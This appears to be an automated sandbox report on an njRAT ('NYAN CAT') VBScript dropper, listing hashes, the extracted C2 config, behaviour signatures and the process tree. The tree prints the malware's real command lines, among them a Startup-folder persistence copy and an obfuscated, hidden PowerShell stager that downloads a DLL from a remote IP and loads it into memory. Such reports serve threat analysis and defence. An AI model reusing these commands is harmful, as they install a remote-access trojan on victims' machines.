njrat | fa0c16419a4f2e838f7f9f72f252b5f391da16d47910c1a7a84d8e3b01d1b550

General

Target

92baf7d1d57f1c7c6368c79646304ddb.vbs
Size

488KB
MD5

92baf7d1d57f1c7c6368c79646304ddb
SHA1

243ea00cea30c24c463b2263479502481458ec41
SHA256

fa0c16419a4f2e838f7f9f72f252b5f391da16d47910c1a7a84d8e3b01d1b550
SHA512

7ddb663e69b9cec619c9211052d3df31b942d7cc56c6c9da4d469ce09c072559eb24544f64974a42c36e9eeb324c30a22029a93e2f04dceeb036c66bc9020c60

Score

10^/10

njrat nyan cat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.49/ramdes/treboldll.txt

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

revg.duckdns.org:57831

Mutex

ebef4abe57d24e8

Attributes

reg_key
ebef4abe57d24e8
splitter
@!#&^%$

Signatures

njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

18 2972 powershell.exe

flow	pid	process
18	2972	powershell.exe

Drops startup file 2 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2972 set thread context of 2208 2972 powershell.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

752 PING.EXE

description	pid	process	target process
PID 2972 set thread context of 2208	2972	powershell.exe	RegAsm.exe

pid	process
752	PING.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
1944	powershell.exe
1944	powershell.exe
1944	powershell.exe
876	powershell.exe
876	powershell.exe
876	powershell.exe
2972	powershell.exe
2972	powershell.exe
2972	powershell.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe
Token: SeDebugPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe
Token: 33	2208	RegAsm.exe
Token: SeIncBasePriorityPrivilege	2208	RegAsm.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

WScript.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2772 wrote to memory of 2696	2772	WScript.exe	cmd.exe
PID 2772 wrote to memory of 2696	2772	WScript.exe	cmd.exe
PID 2696 wrote to memory of 752	2696	cmd.exe	PING.EXE
PID 2696 wrote to memory of 752	2696	cmd.exe	PING.EXE
PID 2696 wrote to memory of 1944	2696	cmd.exe	powershell.exe
PID 2696 wrote to memory of 1944	2696	cmd.exe	powershell.exe
PID 2772 wrote to memory of 876	2772	WScript.exe	powershell.exe
PID 2772 wrote to memory of 876	2772	WScript.exe	powershell.exe
PID 876 wrote to memory of 2972	876	powershell.exe	powershell.exe
PID 876 wrote to memory of 2972	876	powershell.exe	powershell.exe
PID 2972 wrote to memory of 2208	2972	powershell.exe	RegAsm.exe
PID 2972 wrote to memory of 2208	2972	powershell.exe	RegAsm.exe
PID 2972 wrote to memory of 2208	2972	powershell.exe	RegAsm.exe
PID 2972 wrote to memory of 2208	2972	powershell.exe	RegAsm.exe
PID 2972 wrote to memory of 2208	2972	powershell.exe	RegAsm.exe
PID 2972 wrote to memory of 2208	2972	powershell.exe	RegAsm.exe
PID 2972 wrote to memory of 2208	2972	powershell.exe	RegAsm.exe
PID 2972 wrote to memory of 2208	2972	powershell.exe	RegAsm.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\92baf7d1d57f1c7c6368c79646304ddb.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\92baf7d1d57f1c7c6368c79646304ddb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs')
2⤵
- Suspicious use of WriteProcessMemory
PID:2696

C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 10
3⤵
- Runs ping.exe
PID:752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\92baf7d1d57f1c7c6368c79646304ddb.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VHK.vbs')
3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'WwBC⁂Hk⁂d⁂Bl⁂Fs⁂XQBd⁂C⁂⁂J⁂BE⁂Ew⁂T⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂K⁂BO⁂GU⁂dw⁂t⁂E8⁂YgBq⁂GU⁂YwB0⁂C⁂⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂p⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂Dk⁂MQ⁂u⁂DI⁂N⁂⁂x⁂C4⁂MQ⁂5⁂C4⁂N⁂⁂5⁂C8⁂cgBh⁂G0⁂Z⁂Bl⁂HM⁂LwB0⁂HI⁂ZQBi⁂G8⁂b⁂Bk⁂Gw⁂b⁂⁂u⁂HQ⁂e⁂B0⁂Cc⁂KQ⁂p⁂Ds⁂WwBT⁂Hk⁂cwB0⁂GU⁂bQ⁂u⁂EE⁂c⁂Bw⁂EQ⁂bwBt⁂GE⁂aQBu⁂F0⁂Og⁂6⁂EM⁂dQBy⁂HI⁂ZQBu⁂HQ⁂R⁂Bv⁂G0⁂YQBp⁂G4⁂LgBM⁂G8⁂YQBk⁂Cg⁂J⁂BE⁂Ew⁂T⁂⁂p⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂QwBs⁂GE⁂cwBz⁂Ew⁂aQBi⁂HI⁂YQBy⁂Hk⁂Mw⁂u⁂EM⁂b⁂Bh⁂HM⁂cw⁂x⁂Cc⁂KQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBS⁂HU⁂bg⁂n⁂Ck⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂WwBv⁂GI⁂agBl⁂GM⁂d⁂Bb⁂F0⁂XQ⁂g⁂Cg⁂JwB0⁂Hg⁂d⁂⁂u⁂DQ⁂cwBu⁂C8⁂d⁂Bz⁂GU⁂d⁂⁂v⁂Dk⁂N⁂⁂u⁂Dk⁂MQ⁂u⁂DE⁂N⁂⁂y⁂C4⁂MQ⁂5⁂C8⁂Lw⁂6⁂H⁂⁂d⁂B0⁂Gg⁂Jw⁂p⁂Ck⁂';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $Codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ramdes/treboldll.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.4sn/tset/94.91.142.19//:ptth'))"
3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2208

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
e310d7f21439f2394f3fe0e3ff83d1cb

SHA1
f2ce61b4f8778708ffcb1b6a0f752ad909242649

SHA256
a9250a410ef39a610912b7f03465e2a9c7b2d678a35b7c190e2b48a77c25b1ac

SHA512
c674b98bb53caa70b842d3e54851de0ef8de1d45cdc735b1c8d034485ee2ac6dfece51cf05d8df1094ecc52a1857d7c7f04469303c28bfd77fa6f9771e81c177

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
54123279e74436708ecacd5d1aebb3b0

SHA1
aecc07ec14ea530d8bda48722736b93ec244098f

SHA256
00ee2dd51aacc80812ce43a55c7774e047f5629d47901475695f348fedac1707

SHA512
64c0e12af262f68dca316c4d7fecb1c427caa3d2428994de0cbeaa33ee8830f838229ebc4f7a99a7a580c317951b66d98ac92988d673d087e561751ef0c39335

Download Submit
memory/752-116-0x0000000000000000-mapping.dmp

Download
memory/876-145-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-182-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-151-0x000001D3B0B40000-0x000001D3B0B42000-memory.dmp

Filesize
8KB

Download
memory/876-148-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-147-0x000001D3B2DA0000-0x000001D3B2E16000-memory.dmp

Filesize
472KB

Download
memory/876-146-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-137-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-144-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-143-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-152-0x000001D3B0B43000-0x000001D3B0B45000-memory.dmp

Filesize
8KB

Download
memory/876-141-0x000001D3B0B10000-0x000001D3B0B32000-memory.dmp

Filesize
136KB

Download
memory/876-140-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-139-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-138-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-134-0x0000000000000000-mapping.dmp

Download
memory/876-136-0x000001D396C00000-0x000001D396C02000-memory.dmp

Filesize
8KB

Download
memory/876-183-0x000001D3B0B46000-0x000001D3B0B48000-memory.dmp

Filesize
8KB

Download
memory/1944-131-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-133-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-117-0x0000000000000000-mapping.dmp

Download
memory/1944-130-0x0000022C2D430000-0x0000022C2D4A6000-memory.dmp

Filesize
472KB

Download
memory/1944-129-0x0000022C12C53000-0x0000022C12C55000-memory.dmp

Filesize
8KB

Download
memory/1944-128-0x0000022C12C50000-0x0000022C12C52000-memory.dmp

Filesize
8KB

Download
memory/1944-127-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-126-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-125-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-124-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-123-0x0000022C2D280000-0x0000022C2D2A2000-memory.dmp

Filesize
136KB

Download
memory/1944-122-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-150-0x0000022C12C56000-0x0000022C12C58000-memory.dmp

Filesize
8KB

Download
memory/1944-121-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-119-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-118-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/1944-120-0x0000022C11280000-0x0000022C11282000-memory.dmp

Filesize
8KB

Download
memory/2208-178-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2208-179-0x000000000040676E-mapping.dmp

Download
memory/2208-191-0x0000000005B30000-0x0000000005B96000-memory.dmp

Filesize
408KB

Download
memory/2208-190-0x00000000058C0000-0x00000000058CA000-memory.dmp

Filesize
40KB

Download
memory/2208-189-0x0000000005810000-0x0000000005D0E000-memory.dmp

Filesize
5.0MB

Download
memory/2208-188-0x00000000059C0000-0x0000000005A52000-memory.dmp

Filesize
584KB

Download
memory/2208-187-0x0000000005D10000-0x000000000620E000-memory.dmp

Filesize
5.0MB

Download
memory/2208-186-0x0000000005770000-0x000000000580C000-memory.dmp

Filesize
624KB

Download
memory/2208-185-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2208-184-0x0000000000400000-0x000000000040C000-memory.dmp

Filesize
48KB

Download
memory/2696-115-0x0000000000000000-mapping.dmp

Download
memory/2972-163-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-154-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-174-0x000001DBAFAB3000-0x000001DBAFAB5000-memory.dmp

Filesize
8KB

Download
memory/2972-175-0x000001DBAFAB6000-0x000001DBAFAB8000-memory.dmp

Filesize
8KB

Download
memory/2972-176-0x000001DBC9D90000-0x000001DBC9DA0000-memory.dmp

Filesize
64KB

Download
memory/2972-177-0x000001DBC9DA0000-0x000001DBC9DBA000-memory.dmp

Filesize
104KB

Download
memory/2972-155-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-172-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-180-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-173-0x000001DBAFAB0000-0x000001DBAFAB2000-memory.dmp

Filesize
8KB

Download
memory/2972-153-0x0000000000000000-mapping.dmp

Download
memory/2972-166-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-165-0x000001DBC9DF0000-0x000001DBC9E66000-memory.dmp

Filesize
472KB

Download
memory/2972-156-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-164-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-162-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-160-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-159-0x000001DBC9C40000-0x000001DBC9C62000-memory.dmp

Filesize
136KB

Download
memory/2972-158-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download
memory/2972-157-0x000001DBAF510000-0x000001DBAF512000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads